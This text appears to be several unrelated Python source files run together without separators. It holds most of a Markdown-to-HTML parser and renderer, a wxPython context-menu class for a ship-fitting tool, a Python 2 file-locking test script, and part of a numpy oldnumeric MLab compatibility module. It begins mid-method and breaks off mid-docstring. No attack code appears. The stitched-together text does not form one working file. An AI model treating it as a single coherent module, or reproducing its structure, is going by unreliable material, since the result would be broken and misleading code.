        if length > 1:
            self.tokens.append({'type': 'newline'})

    def parse_block_code(self, m):
        """Emit a 'code' token for an indented (4-space) code block."""
        # clean leading whitespace
        code = _block_code_leading_pattern.sub('', m.group(0))
        self.tokens.append({
            'type': 'code',
            'lang': None,
            'text': code,
        })

    def parse_fences(self, m):
        """Emit a 'code' token for a fenced block, with its language tag."""
        self.tokens.append({
            'type': 'code',
            'lang': m.group(2),
            'text': m.group(3),
        })

    def parse_heading(self, m):
        """Emit a 'heading' token for an ATX heading; level = number of #."""
        self.tokens.append({
            'type': 'heading',
            'level': len(m.group(1)),
            'text': m.group(2),
        })

    def parse_lheading(self, m):
        """Parse setext heading."""
        self.tokens.append({
            'type': 'heading',
            'level': 1 if m.group(2) == '=' else 2,
            'text': m.group(1),
        })

    def parse_hrule(self, m):
        """Emit a 'hrule' token."""
        self.tokens.append({'type': 'hrule'})

    def parse_list_block(self, m):
        """Emit list_start / items / list_end tokens for a whole list."""
        bull = m.group(2)
        self.tokens.append({
            'type': 'list_start',
            'ordered': '.' in bull,
        })
        cap = m.group(0)
        self._process_list_item(cap, bull)
        self.tokens.append({'type': 'list_end'})

    def _process_list_item(self, cap, bull):
        """Split a list block into items and lex each item recursively."""
        cap = self.rules.list_item.findall(cap)

        _next = False
        length = len(cap)

        for i in range(length):
            item = cap[i][0]

            # remove the bullet
            space = len(item)
            item = self.rules.list_bullet.sub('', item)

            # outdent
            if '\n ' in item:
                space = space - len(item)
                pattern = re.compile(r'^ {1,%d}' % space, flags=re.M)
                item = pattern.sub('', item)

            # determine whether item is loose or not
            loose = _next
            if not loose and re.search(r'\n\n(?!\s*$)', item):
                loose = True

            rest = len(item)
            if i != length - 1 and rest:
                _next = item[rest-1] == '\n'
                if not loose:
                    loose = _next

            if loose:
                t = 'loose_item_start'
            else:
                t = 'list_item_start'

            self.tokens.append({'type': t})
            # recurse
            self.parse(item, self.list_rules)
            self.tokens.append({'type': 'list_item_end'})

    def parse_block_quote(self, m):
        """Emit block_quote_start/.../block_quote_end, lexing the body."""
        self.tokens.append({'type': 'block_quote_start'})
        # clean leading >
        cap = _block_quote_leading_pattern.sub('', m.group(0))
        self.parse(cap)
        self.tokens.append({'type': 'block_quote_end'})

    def parse_def_links(self, m):
        """Record a [key]: link "title" definition (emits no token)."""
        key = _keyify(m.group(1))
        self.def_links[key] = {
            'link': m.group(2),
            'title': m.group(3),
        }

    def parse_def_footnotes(self, m):
        """Record a footnote definition and lex its (outdented) body."""
        key = _keyify(m.group(1))
        if key in self.def_footnotes:
            # footnote is already defined
            return

        self.def_footnotes[key] = 0

        self.tokens.append({
            'type': 'footnote_start',
            'key': key,
        })

        text = m.group(2)

        if '\n' in text:
            # Strip the minimal common indentation from continuation lines.
            lines = text.split('\n')
            whitespace = None
            for line in lines[1:]:
                space = len(line) - len(line.lstrip())
                if space and (not whitespace or space < whitespace):
                    whitespace = space
            newlines = [lines[0]]
            for line in lines[1:]:
                newlines.append(line[whitespace:])
            text = '\n'.join(newlines)

        self.parse(text, self.footnote_rules)

        self.tokens.append({
            'type': 'footnote_end',
            'key': key,
        })

    def parse_table(self, m):
        """Emit a 'table' token for a piped table (header/align/cells)."""
        item = self._process_table(m)

        cells = re.sub(r'(?: *\| *)?\n$', '', m.group(3))
        cells = cells.split('\n')
        for i, v in enumerate(cells):
            v = re.sub(r'^ *\| *| *\| *$', '', v)
            cells[i] = re.split(r' *\| *', v)

        item['cells'] = cells
        self.tokens.append(item)

    def parse_nptable(self, m):
        """Emit a 'table' token for a table without leading pipes."""
        item = self._process_table(m)

        cells = re.sub(r'\n$', '', m.group(3))
        cells = cells.split('\n')
        for i, v in enumerate(cells):
            cells[i] = re.split(r' *\| *', v)

        item['cells'] = cells
        self.tokens.append(item)

    def _process_table(self, m):
        """Build the header/alignment part of a 'table' token."""
        header = re.sub(r'^ *| *\| *$', '', m.group(1))
        header = re.split(r' *\| *', header)
        align = re.sub(r' *|\| *$', '', m.group(2))
        align = re.split(r' *\| *', align)

        # Map the separator row (---, :--, --:, :-:) to alignment names.
        for i, v in enumerate(align):
            if re.search(r'^ *-+: *$', v):
                align[i] = 'right'
            elif re.search(r'^ *:-+: *$', v):
                align[i] = 'center'
            elif re.search(r'^ *:-+ *$', v):
                align[i] = 'left'
            else:
                align[i] = None

        item = {
            'type': 'table',
            'header': header,
            'align': align,
        }
        return item

    def parse_block_html(self, m):
        """Emit 'close_html' (comment/self-closing) or 'open_html' tokens."""
        tag = m.group(1)
        if not tag:
            text = m.group(0)
            self.tokens.append({
                'type': 'close_html',
                'text': text
            })
        else:
            attr = m.group(2)
            text = m.group(3)
            self.tokens.append({
                'type': 'open_html',
                'tag': tag,
                'extra': attr,
                'text': text
            })

    def parse_paragraph(self, m):
        """Emit a 'paragraph' token."""
        text = m.group(1).rstrip('\n')
        self.tokens.append({'type': 'paragraph', 'text': text})

    def parse_text(self, m):
        """Emit a plain 'text' token for a single line."""
        text = m.group(0)
        self.tokens.append({'type': 'text', 'text': text})


class InlineGrammar(object):
    """Grammars for inline level tokens."""

    escape = re.compile(r'^\\([\\`*{}\[\]()#+\-.!_>~|])')  # \* \+ \! ....
    # Raw inline HTML: comment, paired tag, or self-closing tag.
    inline_html = re.compile(
        r'^(?:%s|%s|%s)' % (
            r'<!--[\s\S]*?-->',
            r'<(\w+%s)((?:%s)*?)\s*>([\s\S]*?)<\/\1>' % (_valid_end, _valid_attr),
            r'<\w+%s(?:%s)*?\s*\/?>' % (_valid_end, _valid_attr),
        )
    )
    # <http://url> or <user@host> style autolinks.
    autolink = re.compile(r'^<([^ >]+(@|:)[^ >]+)>')
    # [text](link "title") and ![alt](src "title").
    link = re.compile(
        r'^!?\[('
        r'(?:\[[^^\]]*\]|[^\[\]]|\](?=[^\[]*\]))*'
        r')\]\('
        r'''\s*(<)?([\s\S]*?)(?(2)>)(?:\s+['"]([\s\S]*?)['"])?\s*'''
        r'\)'
    )
    # [text][key] reference-style link.
    reflink = re.compile(
        r'^!?\[('
        r'(?:\[[^^\]]*\]|[^\[\]]|\](?=[^\[]*\]))*'
        r')\]\s*\[([^^\]]*)\]'
    )
    # [key] shorthand reference link.
    nolink = re.compile(r'^!?\[((?:\[[^\]]*\]|[^\[\]])*)\]')
    # Bare http(s) URL.
    url = re.compile(r'''^(https?:\/\/[^\s<]+[^<.,:;"')\]\s])''')
    double_emphasis = re.compile(
        r'^_{2}([\s\S]+?)_{2}(?!_)'  # __word__
        r'|'
        r'^\*{2}([\s\S]+?)\*{2}(?!\*)'  # **word**
    )
    emphasis = re.compile(
        r'^\b_((?:__|[^_])+?)_\b'  # _word_
        r'|'
        r'^\*((?:\*\*|[^\*])+?)\*(?!\*)'  # *word*
    )
    code = re.compile(r'^(`+)\s*([\s\S]*?[^`])\s*\1(?!`)')  # `code`
    # Two or more trailing spaces force a line break.
    linebreak = re.compile(r'^ {2,}\n(?!\s*$)')
    strikethrough = re.compile(r'^~~(?=\S)([\s\S]*?\S)~~')  # ~~word~~
    # [^key] footnote reference.
    footnote = re.compile(r'^\[\^([^\]]+)\]')
    # Plain text up to the next character that could start an inline token.
    text = re.compile(r'^[\s\S]+?(?=[\\<!\[_*`~]|https?://| {2,}\n|$)')

    def hard_wrap(self):
        """Grammar for hard wrap linebreak. You don't need to add two
        spaces at the end of a line.
        """
        self.linebreak = re.compile(r'^ *\n(?!\s*$)')
        self.text = re.compile(
            r'^[\s\S]+?(?=[\\<!\[_*`~]|https?://| *\n|$)'
        )


class InlineLexer(object):
    """Inline level lexer for inline grammars."""
    grammar_class = InlineGrammar

    # Rules tried, in order, for normal inline text.
    default_rules = [
        'escape', 'inline_html', 'autolink', 'url',
        'footnote', 'link', 'reflink', 'nolink',
        'double_emphasis', 'emphasis', 'code',
        'linebreak', 'strikethrough', 'text',
    ]
    # Restricted rules used when recursing into parsed inline HTML.
    inline_html_rules = [
        'escape', 'autolink', 'url', 'link', 'reflink',
        'nolink', 'double_emphasis', 'emphasis', 'code',
        'linebreak', 'strikethrough', 'text',
    ]

    def __init__(self, renderer, rules=None, **kwargs):
        """Create an inline lexer bound to *renderer*.

        :param renderer: object whose methods produce the output pieces.
        :param rules: grammar instance; defaults to ``grammar_class()``.
        """
        self.renderer = renderer
        self.links = {}
        self.footnotes = {}
        self.footnote_index = 0

        if not rules:
            rules = self.grammar_class()

        # Renderer options take precedence over the keyword arguments.
        kwargs.update(self.renderer.options)
        if kwargs.get('hard_wrap'):
            rules.hard_wrap()

        self.rules = rules

        self._in_link = False
        self._in_footnote = False
        self._parse_inline_html = kwargs.get('parse_inline_html')

    def __call__(self, text, rules=None):
        """Shortcut for :meth:`output`."""
        return self.output(text, rules)

    def setup(self, links, footnotes):
        """Install link/footnote definitions collected by the block lexer."""
        self.footnote_index = 0
        self.links = links or {}
        self.footnotes = footnotes or {}

    def output(self, text, rules=None):
        """Render *text* by repeatedly applying the first matching rule."""
        text = text.rstrip('\n')
        if not rules:
            rules = list(self.default_rules)

        # Footnote references are not allowed inside footnote bodies.
        if self._in_footnote and 'footnote' in rules:
            rules.remove('footnote')

        output = self.renderer.placeholder()

        def manipulate(text):
            for key in rules:
                pattern = getattr(self.rules, key)
                m = pattern.match(text)
                if not m:
                    continue
                self.line_match = m
                out = getattr(self, 'output_%s' % key)(m)
                if out is not None:
                    return m, out
            return False  # pragma: no cover

        while text:
            ret = manipulate(text)
            if ret is not False:
                m, out = ret
                output += out
                text = text[len(m.group(0)):]
                continue
            if text:  # pragma: no cover
                raise RuntimeError('Infinite loop at: %s' % text)

        return output

    def output_escape(self, m):
        """Render a backslash-escaped character."""
        text = m.group(1)
        return self.renderer.escape(text)

    def output_autolink(self, m):
        """Render an <...> autolink; '@' marks it as an email address."""
        link = m.group(1)
        if m.group(2) == '@':
            is_email = True
        else:
            is_email = False
        return self.renderer.autolink(link, is_email)

    def output_url(self, m):
        """Render a bare URL (as plain text when already inside a link)."""
        link = m.group(1)
        if self._in_link:
            return self.renderer.text(link)
        return self.renderer.autolink(link, False)

    def output_inline_html(self, m):
        """Render inline HTML, optionally re-lexing the tag's contents."""
        tag = m.group(1)
        if self._parse_inline_html and tag in _inline_tags:
            text = m.group(3)
            if tag == 'a':
                # Suppress nested autolinks while inside an <a> tag.
                self._in_link = True
                text = self.output(text, rules=self.inline_html_rules)
                self._in_link = False
            else:
                text = self.output(text, rules=self.inline_html_rules)
            extra = m.group(2) or ''
            html = '<%s%s>%s</%s>' % (tag, extra, text, tag)
        else:
            html = m.group(0)
        return self.renderer.inline_html(html)

    def output_footnote(self, m):
        """Render a footnote reference; None for unknown/already-used keys."""
        key = _keyify(m.group(1))
        if key not in self.footnotes:
            return None
        if self.footnotes[key]:
            return None
        self.footnote_index += 1
        self.footnotes[key] = self.footnote_index
        return self.renderer.footnote_ref(key, self.footnote_index)

    def output_link(self, m):
        """Render an inline [text](link "title") link or image."""
        return self._process_link(m, m.group(3), m.group(4))

    def output_reflink(self, m):
        """Render a [text][key] reference link; None when key is unknown."""
        key = _keyify(m.group(2) or m.group(1))
        if key not in self.links:
            return None
        ret = self.links[key]
        return self._process_link(m, ret['link'], ret['title'])

    def output_nolink(self, m):
        """Render a [key] shorthand link; None when key is unknown."""
        key = _keyify(m.group(1))
        if key not in self.links:
            return None
        ret = self.links[key]
        return self._process_link(m, ret['link'], ret['title'])

    def _process_link(self, m, link, title=None):
        """Render a link or, when the match starts with '!', an image."""
        line = m.group(0)
        text = m.group(1)
        if line[0] == '!':
            return self.renderer.image(link, title, text)

        self._in_link = True
        text = self.output(text)
        self._in_link = False
        return self.renderer.link(link, title, text)

    def output_double_emphasis(self, m):
        """Render **strong** / __strong__ text."""
        text = m.group(2) or m.group(1)
        text = self.output(text)
        return self.renderer.double_emphasis(text)

    def output_emphasis(self, m):
        """Render *emphasised* / _emphasised_ text."""
        text = m.group(2) or m.group(1)
        text = self.output(text)
        return self.renderer.emphasis(text)

    def output_code(self, m):
        """Render a `code` span."""
        text = m.group(2)
        return self.renderer.codespan(text)

    def output_linebreak(self, m):
        """Render a hard line break."""
        return self.renderer.linebreak()

    def output_strikethrough(self, m):
        """Render ~~struck~~ text."""
        text = self.output(m.group(1))
        return self.renderer.strikethrough(text)

    def output_text(self, m):
        """Render plain text."""
        text = m.group(0)
        return self.renderer.text(text)


class Renderer(object):
    """The default HTML renderer for rendering Markdown.

    Each method receives already-parsed content and returns an HTML
    fragment (a plain string, unless ``placeholder`` is overridden).
    Behaviour is tuned by keyword options stored in ``self.options``
    (e.g. ``escape``, ``use_xhtml``, ``skip_style``, ``parse_block_html``),
    all read lazily with ``options.get()``.
    """

    def __init__(self, **kwargs):
        # Keep the raw keyword options; they are consulted per-call below.
        self.options = kwargs

    def placeholder(self):
        """Returns the default, empty output value for the renderer.

        All renderer methods use the '+=' operator to append to this value.
        Default is a string so rendering HTML can build up a result string with
        the rendered Markdown.

        Can be overridden by Renderer subclasses to be types like an empty
        list, allowing the renderer to create a tree-like structure to
        represent the document (which can then be reprocessed later into a
        separate format like docx or pdf).
        """
        return ''

    def block_code(self, code, lang=None):
        """Rendering block level code. ``pre > code``.

        :param code: text content of the code block.
        :param lang: language of the given code.
        """
        code = code.rstrip('\n')
        if not lang:
            # smart_amp=False: ampersands inside code are escaped literally.
            code = escape(code, smart_amp=False)
            return '<pre><code>%s\n</code></pre>\n' % code
        # quote=True also escapes quotes, since lang ends up in an attribute-rich tag.
        code = escape(code, quote=True, smart_amp=False)
        return '<pre><code class="lang-%s">%s\n</code></pre>\n' % (lang, code)

    def block_quote(self, text):
        """Rendering <blockquote> with the given text.

        :param text: text content of the blockquote.
        """
        return '<blockquote>%s\n</blockquote>\n' % text.rstrip('\n')

    def block_html(self, html):
        """Rendering block level pure html content.

        :param html: text content of the html snippet.
        """
        # skip_style drops <style> blocks entirely.
        if self.options.get('skip_style') and \
           html.lower().startswith('<style'):
            return ''
        if self.options.get('escape'):
            return escape(html)
        return html

    def header(self, text, level, raw=None):
        """Rendering header/heading tags like ``<h1>`` ``<h2>``.

        :param text: rendered text content for the header.
        :param level: a number for the header level, for example: 1.
        :param raw: raw text content of the header (unused here; kept for
            subclasses that need it, e.g. to build anchors).
        """
        return '<h%d>%s</h%d>\n' % (level, text, level)

    def hrule(self):
        """Rendering method for ``<hr>`` tag."""
        # use_xhtml selects the self-closing form.
        if self.options.get('use_xhtml'):
            return '<hr />\n'
        return '<hr>\n'

    def list(self, body, ordered=True):
        """Rendering list tags like ``<ul>`` and ``<ol>``.

        :param body: body contents of the list.
        :param ordered: whether this list is ordered or not.
        """
        tag = 'ul'
        if ordered:
            tag = 'ol'
        return '<%s>\n%s</%s>\n' % (tag, body, tag)

    def list_item(self, text):
        """Rendering list item snippet. Like ``<li>``."""
        return '<li>%s</li>\n' % text

    def paragraph(self, text):
        """Rendering paragraph tags. Like ``<p>``."""
        return '<p>%s</p>\n' % text.strip(' ')

    def table(self, header, body):
        """Rendering table element. Wrap header and body in it.

        :param header: header part of the table.
        :param body: body part of the table.
        """
        return (
            '<table>\n<thead>%s</thead>\n'
            '<tbody>\n%s</tbody>\n</table>\n'
        ) % (header, body)

    def table_row(self, content):
        """Rendering a table row. Like ``<tr>``.

        :param content: content of current table row.
        """
        return '<tr>\n%s</tr>\n' % content

    def table_cell(self, content, **flags):
        """Rendering a table cell. Like ``<th>`` ``<td>``.

        :param content: content of current table cell.
        :param header: whether this is header or not.
        :param align: align of current table cell.
        """
        # NOTE: callers must supply both 'header' and 'align' keys
        # (see Markdown.output_table), otherwise this raises KeyError.
        if flags['header']:
            tag = 'th'
        else:
            tag = 'td'
        align = flags['align']
        if not align:
            return '<%s>%s</%s>\n' % (tag, content, tag)
        return '<%s style="text-align:%s">%s</%s>\n' % (
            tag, align, content, tag
        )

    def double_emphasis(self, text):
        """Rendering **strong** text.

        :param text: text content for emphasis.
        """
        return '<strong>%s</strong>' % text

    def emphasis(self, text):
        """Rendering *emphasis* text.

        :param text: text content for emphasis.
        """
        return '<em>%s</em>' % text

    def codespan(self, text):
        """Rendering inline `code` text.

        :param text: text content for inline code.
        """
        text = escape(text.rstrip(), smart_amp=False)
        return '<code>%s</code>' % text

    def linebreak(self):
        """Rendering line break like ``<br>``."""
        if self.options.get('use_xhtml'):
            return '<br />\n'
        return '<br>\n'

    def strikethrough(self, text):
        """Rendering ~~strikethrough~~ text.

        :param text: text content for strikethrough.
        """
        return '<del>%s</del>' % text

    def text(self, text):
        """Rendering unformatted text.

        :param text: text content.
        """
        # When block HTML is parsed, plain text is emitted verbatim so that
        # surrounding markup is not double-escaped.
        if self.options.get('parse_block_html'):
            return text
        return escape(text)

    def escape(self, text):
        """Rendering escape sequence.

        :param text: text content.
        """
        return escape(text)

    def autolink(self, link, is_email=False):
        """Rendering a given link or email address.

        :param link: link content or email address.
        :param is_email: whether this is an email or not.
        """
        text = link = escape(link)
        if is_email:
            link = 'mailto:%s' % link
        return '<a href="%s">%s</a>' % (link, text)

    def link(self, link, title, text):
        """Rendering a given link with content and title.

        :param link: href link for ``<a>`` tag.
        :param title: title content for `title` attribute.
        :param text: text content for description.
        """
        # escape_link sanitizes the URL (distinct from plain HTML escaping).
        link = escape_link(link)
        if not title:
            return '<a href="%s">%s</a>' % (link, text)
        title = escape(title, quote=True)
        return '<a href="%s" title="%s">%s</a>' % (link, title, text)

    def image(self, src, title, text):
        """Rendering a image with title and text.

        :param src: source link of the image.
        :param title: title text of the image.
        :param text: alt text of the image.
        """
        src = escape_link(src)
        text = escape(text, quote=True)
        if title:
            title = escape(title, quote=True)
            html = '<img src="%s" alt="%s" title="%s"' % (src, text, title)
        else:
            html = '<img src="%s" alt="%s"' % (src, text)
        if self.options.get('use_xhtml'):
            return '%s />' % html
        return '%s>' % html

    def inline_html(self, html):
        """Rendering span level pure html content.

        :param html: text content of the html snippet.
        """
        if self.options.get('escape'):
            return escape(html)
        return html

    def newline(self):
        """Rendering newline element."""
        return ''

    def footnote_ref(self, key, index):
        """Rendering the ref anchor of a footnote.

        :param key: identity key for the footnote.
        :param index: the index count of current footnote.
        """
        html = (
            '<sup class="footnote-ref" id="fnref-%s">'
            '<a href="#fn-%s" rel="footnote">%d</a></sup>'
        ) % (escape(key), escape(key), index)
        return html

    def footnote_item(self, key, text):
        """Rendering a footnote item.

        :param key: identity key for the footnote.
        :param text: text content of the footnote.
        """
        back = (
            '<a href="#fnref-%s" rev="footnote">&#8617;</a>'
        ) % escape(key)
        text = text.rstrip()
        # Place the back-reference inside the final paragraph when there is
        # one; otherwise wrap it in its own paragraph.
        if text.endswith('</p>'):
            text = re.sub(r'<\/p>$', r'%s</p>' % back, text)
        else:
            text = '%s<p>%s</p>' % (text, back)
        html = '<li id="fn-%s">%s</li>\n' % (escape(key), text)
        return html

    def footnotes(self, text):
        """Wrapper for all footnotes.

        :param text: contents of all footnotes.
        """
        html = '<div class="footnotes">\n%s<ol>%s</ol>\n</div>\n'
        return html % (self.hrule(), text)


class Markdown(object):
    """The Markdown parser.

    :param renderer: An instance of ``Renderer``.
    :param inline: An inline lexer class or instance.
    :param block: A block lexer class or instance.
    """
    def __init__(self, renderer=None, inline=None, block=None, **kwargs):
        if not renderer:
            renderer = Renderer(**kwargs)
        else:
            # Options attached to a user-supplied renderer win over kwargs.
            kwargs.update(renderer.options)

        self.renderer = renderer

        # Classes are instantiated here; instances are used as-is.
        if inline and inspect.isclass(inline):
            inline = inline(renderer, **kwargs)
        if block and inspect.isclass(block):
            block = block(**kwargs)

        if inline:
            self.inline = inline
        else:
            self.inline = InlineLexer(renderer, **kwargs)

        self.block = block or BlockLexer(BlockGrammar())
        self.footnotes = []
        self.tokens = []

        # detect if it should parse text in block html
        self._parse_block_html = kwargs.get('parse_block_html')

    def __call__(self, text):
        return self.parse(text)

    def render(self, text):
        """Render the Markdown text.

        :param text: markdown formatted text content.
        """
        return self.parse(text)

    def parse(self, text):
        """Parse *text* and return the rendered output, appending any
        collected footnotes at the end."""
        out = self.output(preprocessing(text))

        keys = self.block.def_footnotes

        # reset block
        self.block.def_links = {}
        self.block.def_footnotes = {}

        # reset inline
        self.inline.links = {}
        self.inline.footnotes = {}

        if not self.footnotes:
            return out

        # Keep only footnotes that were actually referenced, ordered by
        # reference index (reversed so pop() yields them in order below).
        footnotes = filter(lambda o: keys.get(o['key']), self.footnotes)
        self.footnotes = sorted(
            footnotes, key=lambda o: keys.get(o['key']), reverse=True
        )

        body = self.renderer.placeholder()
        while self.footnotes:
            note = self.footnotes.pop()
            body += self.renderer.footnote_item(
                note['key'], note['text']
            )

        out += self.renderer.footnotes(body)
        return out

    def pop(self):
        # Advance to the next token (tokens list is reversed, so pop() is
        # the front); also remembers it as self.token for tok() to use.
        if not self.tokens:
            return None
        self.token = self.tokens.pop()
        return self.token

    def peek(self):
        # Look at the next token without consuming it.
        if self.tokens:
            return self.tokens[-1]
        return None  # pragma: no cover

    def output(self, text, rules=None):
        """Tokenize *text* with the block lexer and render every token."""
        self.tokens = self.block(text, rules)
        self.tokens.reverse()

        self.inline.setup(self.block.def_links, self.block.def_footnotes)

        out = self.renderer.placeholder()
        while self.pop():
            out += self.tok()
        return out

    def tok(self):
        # Dispatch the current token to its output_<type>() handler.
        t = self.token['type']

        # special cases: '*_start' tokens share the handler of their base type.
        if t.endswith('_start'):
            t = t[:-6]

        return getattr(self, 'output_%s' % t)()

    def tok_text(self):
        # Merge consecutive 'text' tokens into one inline-rendered run.
        # NOTE(review): peek() can return None at the end of the stream,
        # which would raise TypeError here — presumably a terminating token
        # always follows 'text' runs; verify against the block lexer.
        text = self.token['text']
        while self.peek()['type'] == 'text':
            text += '\n' + self.pop()['text']
        return self.inline(text)

    def output_newline(self):
        return self.renderer.newline()

    def output_hrule(self):
        return self.renderer.hrule()

    def output_heading(self):
        return self.renderer.header(
            self.inline(self.token['text']),
            self.token['level'],
            self.token['text'],
        )

    def output_code(self):
        return self.renderer.block_code(
            self.token['text'], self.token['lang']
        )

    def output_table(self):
        aligns = self.token['align']
        aligns_length = len(aligns)
        cell = self.renderer.placeholder()

        # header part
        header = self.renderer.placeholder()
        for i, value in enumerate(self.token['header']):
            # Columns beyond the align spec get no alignment.
            align = aligns[i] if i < aligns_length else None
            flags = {'header': True, 'align': align}
            cell += self.renderer.table_cell(self.inline(value), **flags)

        header += self.renderer.table_row(cell)

        # body part
        body = self.renderer.placeholder()
        for i, row in enumerate(self.token['cells']):
            cell = self.renderer.placeholder()
            for j, value in enumerate(row):
                align = aligns[j] if j < aligns_length else None
                flags = {'header': False, 'align': align}
                cell += self.renderer.table_cell(self.inline(value), **flags)
            body += self.renderer.table_row(cell)

        return self.renderer.table(header, body)

    def output_block_quote(self):
        # Consume nested tokens until the matching end marker.
        body = self.renderer.placeholder()
        while self.pop()['type'] != 'block_quote_end':
            body += self.tok()
        return self.renderer.block_quote(body)

    def output_list(self):
        ordered = self.token['ordered']
        body = self.renderer.placeholder()
        while self.pop()['type'] != 'list_end':
            body += self.tok()
        return self.renderer.list(body, ordered)

    def output_list_item(self):
        # Tight list item: plain text runs go through tok_text (inline only).
        body = self.renderer.placeholder()
        while self.pop()['type'] != 'list_item_end':
            if self.token['type'] == 'text':
                body += self.tok_text()
            else:
                body += self.tok()

        return self.renderer.list_item(body)

    def output_loose_item(self):
        # Loose list item: children are rendered as full blocks (paragraphs).
        body = self.renderer.placeholder()
        while self.pop()['type'] != 'list_item_end':
            body += self.tok()
        return self.renderer.list_item(body)

    def output_footnote(self):
        # Footnote bodies are collected for parse() to append at the end;
        # nothing is emitted in place.
        self.inline._in_footnote = True
        body = self.renderer.placeholder()
        key = self.token['key']
        while self.pop()['type'] != 'footnote_end':
            body += self.tok()
        self.footnotes.append({'key': key, 'text': body})
        self.inline._in_footnote = False
        return self.renderer.placeholder()

    def output_close_html(self):
        text = self.token['text']
        return self.renderer.block_html(text)

    def output_open_html(self):
        text = self.token['text']
        tag = self.token['tag']
        # Optionally parse markdown inside non-preformatted block HTML.
        if self._parse_block_html and tag not in _pre_tags:
            text = self.inline(text, rules=self.inline.inline_html_rules)
        extra = self.token.get('extra') or ''
        html = '<%s%s>%s</%s>' % (tag, extra, text, tag)
        return self.renderer.block_html(html)

    def output_paragraph(self):
        return self.renderer.paragraph(self.inline(self.token['text']))

    def output_text(self):
        return self.renderer.paragraph(self.tok_text())


def markdown(text, escape=True, **kwargs):
    """Render markdown formatted text to html.

    :param text: markdown formatted text content.
    :param escape: if set to False, all html tags will not be escaped.
    :param use_xhtml: output with xhtml tags.
    :param hard_wrap: if set to True, it will use the GFM line breaks feature.
    :param parse_block_html: parse text only in block level html.
    :param parse_inline_html: parse text only in inline level html.
    """
    md = Markdown(escape=escape, **kwargs)
    return md(text)
# noinspection PyPackageRequirements
import wx

import gui.globalEvents as GE
import gui.mainFrame
from gui.contextMenu import ContextMenuSingle
from service.fit import Fit


class AmmoToDmgPattern(ContextMenuSingle):
    """Context-menu entry that applies an ammo item's damage profile to the
    active fit as its damage pattern."""

    visibilitySetting = 'ammoPattern'

    # Attributes that qualify an item as having a damage profile.
    _DAMAGE_ATTRS = ("emDamage", "thermalDamage", "explosiveDamage", "kineticDamage")

    def __init__(self):
        self.mainFrame = gui.mainFrame.MainFrame.getInstance()

    def display(self, callingWindow, srcContext, mainItem):
        """Show the entry only for market items, with an active fit, when the
        item carries at least one damage attribute."""
        if srcContext not in ("marketItemGroup", "marketItemMisc"):
            return False
        if self.mainFrame.getActiveFit() is None:
            return False
        if mainItem is None:
            return False
        return any(mainItem.getAttribute(attr) is not None for attr in self._DAMAGE_ATTRS)

    def getText(self, callingWindow, itmContext, mainItem):
        """Menu label; falls back to a generic noun when no context is given."""
        label = itmContext if itmContext is not None else "Item"
        return "Set {} as Damage Pattern".format(label)

    def activate(self, callingWindow, fullContext, mainItem, i):
        """Apply the item as the fit's damage pattern and broadcast the change."""
        fitID = self.mainFrame.getActiveFit()
        Fit.getInstance().setAsPattern(fitID, mainItem)
        wx.PostEvent(self.mainFrame, GE.FitChanged(fitIDs=(fitID,)))

    def getBitmap(self, callingWindow, context, mainItem):
        # No icon for this entry.
        return None


# Register this entry with the context-menu framework so it becomes available.
AmmoToDmgPattern.register()

"""import portalocker

with portalocker.Lock('text.txt', timeout=5) as fh:
    fh.write("Sono in testLoxk2.py")
"""
from lockfile import LockFile

lock = LockFile('text.txt')
with lock:
    print lock.path, 'is locked.'
    with open('text.txt', "a") as file:
        file.write("Sono in testLock2.py")

# This module is for compatibility only.  All functions are defined elsewhere.

# Public API re-exported for backward compatibility with old Numeric's MLab.
__all__ = ['rand', 'tril', 'trapz', 'hanning', 'rot90', 'triu', 'diff', 'angle',
           'roots', 'ptp', 'kaiser', 'randn', 'cumprod', 'diag', 'msort',
           'LinearAlgebra', 'RandomArray', 'prod', 'std', 'hamming', 'flipud',
           'max', 'blackman', 'corrcoef', 'bartlett', 'eye', 'squeeze', 'sinc',
           'tri', 'cov', 'svd', 'min', 'median', 'fliplr', 'eig', 'mean']

import numpy.oldnumeric.linear_algebra as LinearAlgebra
import numpy.oldnumeric.random_array as RandomArray
from numpy import tril, trapz as _Ntrapz, hanning, rot90, triu, diff, \
     angle, roots, ptp as _Nptp, kaiser, cumprod as _Ncumprod, \
     diag, msort, prod as _Nprod, std as _Nstd, hamming, flipud, \
     amax as _Nmax, amin as _Nmin, blackman, bartlett, \
     squeeze, sinc, median, fliplr, mean as _Nmean, transpose

from numpy.linalg import eig, svd
from numpy.random import rand, randn
import numpy as np

from typeconv import convtypecode

def eye(N, M=None, k=0, typecode=None, dtype=None):
    """ eye returns a N-by-M 2-d array where the  k-th diagonal is all ones,
        and everything else is zeros.

        :param N: number of rows.
        :param M: number of columns (defaults to N).
        :param k: diagonal offset; positive is above the main diagonal.
        :param typecode: old Numeric typecode (converted via convtypecode).
        :param dtype: numpy dtype; takes precedence per convtypecode.
    """
    dtype = convtypecode(typecode, dtype)
    if M is None: M = N
    m = np.equal(np.subtract.outer(np.arange(N), np.arange(M)), -k)
    if m.dtype != dtype:
        return m.astype(dtype)
    # Bug fix: the function previously fell off the end (returning None)
    # when the boolean mask already had the requested dtype.
    return m

def tri(N, M=None, k=0, typecode=None, dtype=None):
    """ returns a N-by-M array where all the diagonals starting from
        lower left corner up to the k-th are all ones.

        :param N: number of rows.
        :param M: number of columns (defaults to N).
        :param k: highest diagonal (offset) filled with ones.
        :param typecode: old Numeric typecode (converted via convtypecode).
        :param dtype: numpy dtype; takes precedence per convtypecode.
    """
    dtype = convtypecode(typecode, dtype)
    if M is None: M = N
    m = np.greater_equal(np.subtract.outer(np.arange(N), np.arange(M)), -k)
    if m.dtype != dtype:
        return m.astype(dtype)
    # Bug fix: the function previously fell off the end (returning None)
    # when the boolean mask already had the requested dtype.
    return m

def trapz(y, x=None, axis=-1):
    """Integrate *y* along *axis* using the trapezoidal rule (MLab signature)."""
    result = _Ntrapz(y, x, axis=axis)
    return result

def ptp(x, axis=0):
    """Peak-to-peak (max - min) range of *x* along *axis* (MLab default 0)."""
    return _Nptp(x, axis=axis)

def cumprod(x, axis=0):
    """Cumulative product of *x* along *axis* (MLab default 0)."""
    return _Ncumprod(x, axis=axis)

def max(x, axis=0):
    """Maximum of *x* along *axis* (MLab default 0).

    Deliberately shadows the builtin ``max`` for old-Numeric compatibility.
    """
    return _Nmax(x, axis=axis)

def min(x, axis=0):
    """Minimum of *x* along *axis* (MLab default 0).

    Deliberately shadows the builtin ``min`` for old-Numeric compatibility.
    """
    return _Nmin(x, axis=axis)

def prod(x, axis=0):
    """Product of the elements of *x* along *axis* (MLab default 0)."""
    return _Nprod(x, axis=axis)

def std(x, axis=0):
    """Sample standard deviation of *x* along *axis*.

    Rescales numpy's population standard deviation by sqrt(N/(N-1)) to get
